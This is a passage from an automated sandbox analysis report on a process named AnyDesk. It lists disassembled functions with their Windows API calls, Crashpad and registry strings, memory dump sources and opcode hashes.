                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastUnlock
                                                                                                                                                                                                                                                  • String ID: UnlockFileEx$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc
                                                                                                                                                                                                                                                  • API String ID: 3655728120-672186346
                                                                                                                                                                                                                                                  • Opcode ID: bb38b5cbb400c70aa2fc00393ac5f20d125b92e135f67c0319f2f452aa9b071e
                                                                                                                                                                                                                                                  • Instruction ID: c418c01ff08cc7fd68fca5c1eae0a1132af484a848b8a2eaf2e5e2bcd72b28fb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb38b5cbb400c70aa2fc00393ac5f20d125b92e135f67c0319f2f452aa9b071e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD11233A4007097EE724DEB4FC91BABB3B8EF41358F10486EE295A60E1FB3119058660
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C667C4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LockFileEx.KERNEL32(00000000,00000000,00000000,000000FF,000000FF,?,0000001C,0000001C,00000000), ref: 69C667FA
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C66810
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 69C6681C
                                                                                                                                                                                                                                                  • LockFileEx, xrefs: 69C6682F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastLock
                                                                                                                                                                                                                                                  • String ID: LockFileEx$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc
                                                                                                                                                                                                                                                  • API String ID: 1811722133-1010764315
                                                                                                                                                                                                                                                  • Opcode ID: 532a908ab02b7f829b7045b73b04902672151b46b63790ea442a420c2aa2e713
                                                                                                                                                                                                                                                  • Instruction ID: 66dc220c673591c6a3ffd37b610cb4fc699e96146c572a322941f1abdbff68e6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 532a908ab02b7f829b7045b73b04902672151b46b63790ea442a420c2aa2e713
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A0149755046183AEB10DEB4EC91BEB776CEF09378F40016AE618A60D1EA32594686A1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C66AB6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 69C66AEE
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C66B07
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 69C66B13
                                                                                                                                                                                                                                                  • SetFilePointerEx, xrefs: 69C66B26
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                  • String ID: SetFilePointerEx$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc
                                                                                                                                                                                                                                                  • API String ID: 2976181284-399997206
                                                                                                                                                                                                                                                  • Opcode ID: c02b057b7287d9c1509e96c2b9d9077398f489d70767d37b2f1c3c6f9c6203c0
                                                                                                                                                                                                                                                  • Instruction ID: ca9a3db05fb6977b6c2fd31d72ae09ed0ad046a1657198b8b4fef19c7a7e9cdc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c02b057b7287d9c1509e96c2b9d9077398f489d70767d37b2f1c3c6f9c6203c0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73112636600605ABEB14CE68FED2FAE7769FB40364F408169F616971D2FB319A019A50
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C60518 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CanOfferRelaunch.GCAPI(?,?,?,?), ref: 69C6052C
                                                                                                                                                                                                                                                    • Part of subcall function 69C33FC0: RegCreateKeyExW.ADVAPI32(00000202,?,00000000,00000000,00000000,?,00000000,?), ref: 69C33FFA
                                                                                                                                                                                                                                                    • Part of subcall function 69C33FC0: RegCloseKey.ADVAPI32 ref: 69C3400D
                                                                                                                                                                                                                                                    • Part of subcall function 69C343A0: RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,?,?), ref: 69C343E1
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F147: GetLocalTime.KERNEL32(?), ref: 69C5F15F
                                                                                                                                                                                                                                                    • Part of subcall function 69C34370: RegSetValueExW.ADVAPI32(?,00000202,00000000,00000004,00000004), ref: 69C34390
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}, xrefs: 69C60542
                                                                                                                                                                                                                                                  • RelaunchAllowedAfter, xrefs: 69C60575
                                                                                                                                                                                                                                                  • RelaunchBrandcode, xrefs: 69C6055E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value$CloseCreateLocalOfferRelaunchTime
                                                                                                                                                                                                                                                  • String ID: RelaunchAllowedAfter$RelaunchBrandcode$Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
                                                                                                                                                                                                                                                  • API String ID: 4093175577-67220017
                                                                                                                                                                                                                                                  • Opcode ID: 62e0562e9692aec76acc19c365556e2b2081f88f3c6053f55842ad4f35246786
                                                                                                                                                                                                                                                  • Instruction ID: d6c20c803799bf6d8eafdb0c813b341160da7da24d6d1763baef42476a1005dc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62e0562e9692aec76acc19c365556e2b2081f88f3c6053f55842ad4f35246786
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9116D3590022A6BDB14EEA5FD41ADF7B38AF08354F808465AE11B60A1FB71A920DBD5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C66C33 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • UnlockFileEx.KERNEL32(000000FF,00000000,000000FF,000000FF,?,00000000,00000000), ref: 69C66C5B
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C66C72
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 69C66C7F
                                                                                                                                                                                                                                                  • UnlockFileEx, xrefs: 69C66C92
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastUnlock
                                                                                                                                                                                                                                                  • String ID: UnlockFileEx$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io_win.cc
                                                                                                                                                                                                                                                  • API String ID: 3655728120-168028389
                                                                                                                                                                                                                                                  • Opcode ID: dfbc3594481478d1ce3938b7970902673b1d595d46e31bc71c6e983b883860f9
                                                                                                                                                                                                                                                  • Instruction ID: 74e0969be31cb624634b55c0ce411f6a63e955894ee2d72ab48df1087653ce55
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfbc3594481478d1ce3938b7970902673b1d595d46e31bc71c6e983b883860f9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4017B35904B043AEB00CFB4FD92FAEB37CEB45364F500226E624B60E1FB321D064461
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C50D37 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                                  • Opcode ID: 08bbd95e0c94314e88f8ac9cb1697bb445864f1c51da791db5baa43eeec002dc
                                                                                                                                                                                                                                                  • Instruction ID: da80031735801edf8f3708a9817cbba13b8c605573b6d007ab3c0578f42b900d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08bbd95e0c94314e88f8ac9cb1697bb445864f1c51da791db5baa43eeec002dc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09A18932A043869FE711CF18E8917AEBBE1FF51358F14826DD48ADB281E37489B1C758
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C359B0 Relevance: 6.3, APIs: 4, Instructions: 291COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C34CA0: AcquireSRWLockExclusive.KERNEL32(00000000,00000001,0000000F), ref: 69C34CBC
                                                                                                                                                                                                                                                    • Part of subcall function 69C34CA0: ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C34D21
                                                                                                                                                                                                                                                    • Part of subcall function 69C34E80: AcquireSRWLockExclusive.KERNEL32(00000000,00000000,00000000,00000000), ref: 69C34EDB
                                                                                                                                                                                                                                                    • Part of subcall function 69C34E80: ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C34F0A
                                                                                                                                                                                                                                                    • Part of subcall function 69C34E80: AcquireSRWLockExclusive.KERNEL32(00000000,00000000,00000000,00000000), ref: 69C34FCD
                                                                                                                                                                                                                                                    • Part of subcall function 69C34E80: ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C3500A
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000), ref: 69C35BFA
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C35C1E
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000), ref: 69C35C47
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C35C6B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 17069307-0
                                                                                                                                                                                                                                                  • Opcode ID: 30698d9ed052925614070b01d3ad27930918cc672cca2bf69f2f7105bdf2c445
                                                                                                                                                                                                                                                  • Instruction ID: a21644a8bf8762770113d4e593ccbcbcfe62b5f98ff424adbd1c50a23299a0ca
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30698d9ed052925614070b01d3ad27930918cc672cca2bf69f2f7105bdf2c445
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94B15074E00669DBCB04CF68E5D07AEB7B5BF89348F948169D809E7380FB359942CB91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C22400 Relevance: 6.2, APIs: 4, Instructions: 154fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • OutputDebugStringA.KERNEL32(?), ref: 69C22481
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,00000000), ref: 69C224FF
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,00000000), ref: 69C225AF
                                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 69C225C6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DebugErrorFileIos_base_dtorLastOutputStringWritestd::ios_base::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3426912829-0
                                                                                                                                                                                                                                                  • Opcode ID: ce7fe796dddad8bd3d08f5b1f0f216fb2c4921091a64d85ec6a9a46b4438042f
                                                                                                                                                                                                                                                  • Instruction ID: 06934a46bd91d4729561a191e71c88f625d240b8d3588c2d6d591802e76392aa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce7fe796dddad8bd3d08f5b1f0f216fb2c4921091a64d85ec6a9a46b4438042f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA51E1B56043509FDB04CF54E855AAAB7F8FF89308F40482CF99697191E730E60ACBA3
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5DBFC Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: fdf2d6fff5601896827650a7694e601a39b60bd8cd467cecd34269db04ce6001
                                                                                                                                                                                                                                                  • Instruction ID: e89ff6e74e40f4068ed9d8b6ff91b65af18bc6960847cfa2c33b86a70cd3cb54
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdf2d6fff5601896827650a7694e601a39b60bd8cd467cecd34269db04ce6001
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28411735A003046BE7119FB9AC40BAE3BB9FF42774F108666F41BD61D0FBB44871466A
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4FE76 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 74c7efa4801600ec62c7b9ad5e2bd70ad8509637d70d66a1bb955e6c0bbbc94a
                                                                                                                                                                                                                                                  • Instruction ID: 9335006f843a207a5aed62547944f965cb7bb43f0f575ccbd7b04aa4f02fb1b7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74c7efa4801600ec62c7b9ad5e2bd70ad8509637d70d66a1bb955e6c0bbbc94a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28411376B00708BFE324CF78EC40B5ABBE9EB89B64F10863AE151DB681F77195119790
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C54BE8 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,08A8C445,00000008,00000000,00000000,69C300E9,00000000,-00000018,?,00000001,00000008,08A8C445,00000001,69C300E9,00000001), ref: 69C54C35
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 69C54CBE
                                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 69C54CD0
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C54CD9
                                                                                                                                                                                                                                                    • Part of subcall function 69C4C844: HeapAlloc.KERNEL32(00000000,0000010C,00000004,?,69C4C8A7,?,00000000,?,69C57B70,0000010C,00000004,?,0000010C,?,?,69C4DB9D), ref: 69C4C876
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 573072132-0
                                                                                                                                                                                                                                                  • Opcode ID: 8c7c9a92dea4f98afc31cb89b5c70b8ae295157fce55a7cbb2720c98c999ef30
                                                                                                                                                                                                                                                  • Instruction ID: 78b923635726d52e0b6bb8dcb526e2b19964815ee4be9de98dfd83c78e009af7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c7c9a92dea4f98afc31cb89b5c70b8ae295157fce55a7cbb2720c98c999ef30
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4331CF72A0021AABDF15CF65EC40EAE3BA9EF81714F014128EC15DB250F735E971CBA4
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C32EE0 Relevance: 6.1, APIs: 4, Instructions: 78timeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,?,?,69C60690), ref: 69C32F5B
                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,69C60690), ref: 69C32F6F
                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000001,00000001,?,?,?,?,?,?,?,69C60690), ref: 69C32F83
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 69C32FBD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
